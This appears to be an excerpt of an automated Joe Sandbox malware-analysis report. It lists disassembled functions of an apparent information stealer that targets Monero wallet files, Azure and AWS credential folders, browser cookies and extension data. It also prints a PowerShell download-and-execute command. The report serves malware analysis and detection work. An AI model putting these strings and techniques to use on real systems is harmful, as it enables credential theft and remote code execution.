                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                    • String ID: .keys$\Monero\wallet.keys
                                    • API String ID: 2881711868-3586502688
                                    • Opcode ID: 471eeab0efccf64eb53ceb7640ff7ed004b45e3488ec15ff76947fd8d7923246
                                    • Instruction ID: f8befc3837c043bc743774294b40fbbf4989029cc25fbb65cf1385c464be93a0
                                    • Opcode Fuzzy Hash: 471eeab0efccf64eb53ceb7640ff7ed004b45e3488ec15ff76947fd8d7923246
                                    • Instruction Fuzzy Hash: 37A11871A116059BCB10EBB8DC89FAE7BB9FF45300F444128B905E7292DF34DD168BA1
                                    Function 008DE880 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 200stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 008DE8A1
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008DE8CE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE900
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE90C
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 008DE923
                                    • memset.MSVCRT ref: 008DE961
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008DE98C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DE9C0
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DE9CC
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 008DE9E3
                                    • memset.MSVCRT ref: 008DEA21
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008DEA51
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DEA82
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DEA8E
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008DEAA5
                                    • memset.MSVCRT ref: 008DEAE3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$memset$FolderPathlstrcpy
                                    • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 4067350539-3645552435
                                    • Opcode ID: 8c1e5ce29b1b4ec079c46f8c3301cbc6e80ec08584f30f9c02e940d88421968c
                                    • Instruction ID: 0a1ab11d7ade7d7f54d0a13a73f7df4c480e3d91393e4895a02d6351b3c123fa
                                    • Opcode Fuzzy Hash: 8c1e5ce29b1b4ec079c46f8c3301cbc6e80ec08584f30f9c02e940d88421968c
                                    • Instruction Fuzzy Hash: 4C61C131600744ABD720EBB4CC46FEA7BA4FF88700F408928B694CA2C1DE74D9098797
                                    Function 008E1800 Relevance: 40.8, APIs: 25, Strings: 2, Instructions: 269stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E182F
                                    • lstrlen.KERNEL32(005272F8), ref: 008E1840
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1867
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1872
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E18A1
                                    • lstrlen.KERNEL32(008F5568), ref: 008E18B3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E18D4
                                    • lstrcat.KERNEL32(00000000,008F5568), ref: 008E18E0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E190F
                                    • lstrlen.KERNEL32(00527308), ref: 008E1925
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E194C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1957
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1986
                                    • lstrlen.KERNEL32(008F5568), ref: 008E1998
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E19B9
                                    • lstrcat.KERNEL32(00000000,008F5568), ref: 008E19C5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E19F4
                                    • lstrlen.KERNEL32(00527328), ref: 008E1A0A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1A31
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1A3C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1A6B
                                    • lstrlen.KERNEL32(00527358), ref: 008E1A81
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1AA8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008E1AB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1AE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen
                                    • String ID: (sR$XsR
                                    • API String ID: 1049500425-1658001101
                                    • Opcode ID: 9c02b80d0026b779b6a685ae0e4d2e992931105ad4c7ab131406ba90737fd2a2
                                    • Instruction ID: 635283fffb7ca2f18fcda827a2c86983eabff8beec34631450f1c85da7ea6928
                                    • Opcode Fuzzy Hash: 9c02b80d0026b779b6a685ae0e4d2e992931105ad4c7ab131406ba90737fd2a2
                                    • Instruction Fuzzy Hash: F191E8B16016429BDB20EFFACC98E2BBAF9FF05340B144939A995C7261DF34D845CB60
                                    Function 008DAC12 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32 ref: 008DAC2F
                                    • lstrlen.KERNEL32(0053E088), ref: 008DAC45
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAC6D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DAC78
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DACA1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DACE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DACEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAD17
                                    • lstrlen.KERNEL32(008F509C), ref: 008DAD31
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAD53
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008DAD5F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAD88
                                    • lstrlen.KERNEL32(008F509C), ref: 008DAD9A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DADBC
                                    • lstrcat.KERNEL32(00000000,008F509C), ref: 008DADC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DADF1
                                    • lstrlen.KERNEL32(0053E1D8), ref: 008DAE07
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAE2F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DAE3A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAE63
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DAE9F
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DAEA9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DAECF
                                    • lstrlen.KERNEL32(00000000), ref: 008DAEE5
                                    • lstrcpy.KERNEL32(00000000,0053E160), ref: 008DAF18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen
                                    • String ID: `S
                                    • API String ID: 2762123234-3154622632
                                    • Opcode ID: e14d34a729661de01fca2b4185fcb87ffeee13f1aeae81ac0c40a3df192233e5
                                    • Instruction ID: 1ada25e7be45ff0f9e30b9614ec98736011ee304951947055c31284d0e512094
                                    • Opcode Fuzzy Hash: e14d34a729661de01fca2b4185fcb87ffeee13f1aeae81ac0c40a3df192233e5
                                    • Instruction Fuzzy Hash: 51B10531911A169BCB25EBA8C849FAF7BBAFF40301F140629A814D63A1DF74DD15CB92
                                    Function 008E4800 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(ws2_32.dll,?,008D7741), ref: 008E4806
                                    • GetProcAddress.KERNEL32(00000000,connect), ref: 008E481C
                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 008E482D
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 008E483E
                                    • GetProcAddress.KERNEL32(00000000,htons), ref: 008E484F
                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 008E4860
                                    • GetProcAddress.KERNEL32(00000000,recv), ref: 008E4871
                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 008E4882
                                    • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 008E4893
                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 008E48A4
                                    • GetProcAddress.KERNEL32(00000000,send), ref: 008E48B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                    • API String ID: 2238633743-3087812094
                                    • Opcode ID: 99645add7170f20309a10cc6c61c56db0bffa94980d2f0360aa7868c6058b695
                                    • Instruction ID: 2e3470ce709ce2ece7db9de03b40f0aeb0b332ee16b33f1f8b786ea13bebbb98
                                    • Opcode Fuzzy Hash: 99645add7170f20309a10cc6c61c56db0bffa94980d2f0360aa7868c6058b695
                                    • Instruction Fuzzy Hash: C1113672952724EB8710EBF4EC4DA7A7AB8FA09B06315091AB361D2264DFBC8442DF54
                                    Function 008DBE80 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DBEB3
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DBEE6
                                    • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 008DBEF1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DBF11
                                    • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 008DBF1D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DBF40
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008DBF4B
                                    • lstrlen.KERNEL32(')"), ref: 008DBF56
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DBF73
                                    • lstrcat.KERNEL32(00000000,')"), ref: 008DBF7F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DBFA6
                                    • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 008DBFC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DBFE8
                                    • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 008DBFF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DC01A
                                    • ShellExecuteEx.SHELL32(?), ref: 008DC06C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 4016326548-898575020
                                    • Opcode ID: c144f71fc15fc6b80fa4f0980a7545561bd1c9861a90ef76f37813df4152b6bd
                                    • Instruction ID: 10486239c325ad4c512dd8bbd7215861a1ef5e0ea5f2500dc0fd4276354f0299
                                    • Opcode Fuzzy Hash: c144f71fc15fc6b80fa4f0980a7545561bd1c9861a90ef76f37813df4152b6bd
                                    • Instruction Fuzzy Hash: 98616C71A01A4A9BCB11AFF98C89B6F7BB8FF44300F05462AE505D7351DF34C9068B92
                                    Function 008DDAA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 292stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 008DDAC1
                                    • memset.MSVCRT ref: 008DDAD3
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DDAFB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DDB2E
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DDB3C
                                    • lstrcat.KERNEL32(?,0053E4C0), ref: 008DDB56
                                    • lstrcat.KERNEL32(?,?), ref: 008DDB6A
                                    • lstrcat.KERNEL32(?,0053D0D0), ref: 008DDB7E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DDBAE
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 008DDBB5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DDC1E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                    • String ID: @S
                                    • API String ID: 2367105040-2110166956
                                    • Opcode ID: 6573fb0df5696644e3f06d682cf2694c4f5bbbb6941c73e230ef55ee3d7b75e3
                                    • Instruction ID: 9db030b68c0896aca26dea42e4ce05829d649dcd74cff68f9ee3adf1b04ec545
                                    • Opcode Fuzzy Hash: 6573fb0df5696644e3f06d682cf2694c4f5bbbb6941c73e230ef55ee3d7b75e3
                                    • Instruction Fuzzy Hash: 30B17D71910259AFCB10EFB8CC88EAE7BB9FF48304F14496AE945E7350DA349E45CB91
                                    Function 008D4B10 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4B43
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 008D4B75
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4BC2
                                    • lstrlen.KERNEL32(008F5128), ref: 008D4BCD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4BEA
                                    • lstrcat.KERNEL32(00000000,008F5128), ref: 008D4BF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4C1B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4C48
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4C53
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4C7A
                                    • StrStrA.SHLWAPI(?,00000000), ref: 008D4C8C
                                    • lstrlen.KERNEL32(?), ref: 008D4CA0
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4CE1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4D68
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4D91
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4DBA
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4DE0
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D4E0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 4107348322-3310892237
                                    • Opcode ID: 2b43f5953ed127c69a7a6372fc8d199a49a8ad4fe25c7d984738bdea63fa5381
                                    • Instruction ID: b8a5a7ef88b2f7caecf9fcc7ef60d202b29f42580ab89056c72a45fa7c4aedba
                                    • Opcode Fuzzy Hash: 2b43f5953ed127c69a7a6372fc8d199a49a8ad4fe25c7d984738bdea63fa5381
                                    • Instruction Fuzzy Hash: 99B13731A116069BCB24EFB8D889EAF7BB9FF44300F045629B945E7351DE34EC168B91
                                    Function 008C92E0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008C90F0: InternetOpenA.WININET(008ED014,00000001,00000000,00000000,00000000), ref: 008C910F
                                      • Part of subcall function 008C90F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008C912C
                                      • Part of subcall function 008C90F0: InternetCloseHandle.WININET(00000000), ref: 008C9139
                                    • strlen.MSVCRT ref: 008C9311
                                    • strlen.MSVCRT ref: 008C932A
                                      • Part of subcall function 008C89B0: std::_Xinvalid_argument.LIBCPMT ref: 008C89C6
                                    • strlen.MSVCRT ref: 008C93C9
                                    • strlen.MSVCRT ref: 008C9416
                                    • lstrcat.KERNEL32(?,cookies), ref: 008C9577
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008C9589
                                    • lstrcat.KERNEL32(?,?), ref: 008C959A
                                    • lstrcat.KERNEL32(?,008F5160), ref: 008C95AC
                                    • lstrcat.KERNEL32(?,?), ref: 008C95BD
                                    • lstrcat.KERNEL32(?,.txt), ref: 008C95CF
                                    • lstrlen.KERNEL32(?), ref: 008C95E6
                                    • lstrlen.KERNEL32(?), ref: 008C960B
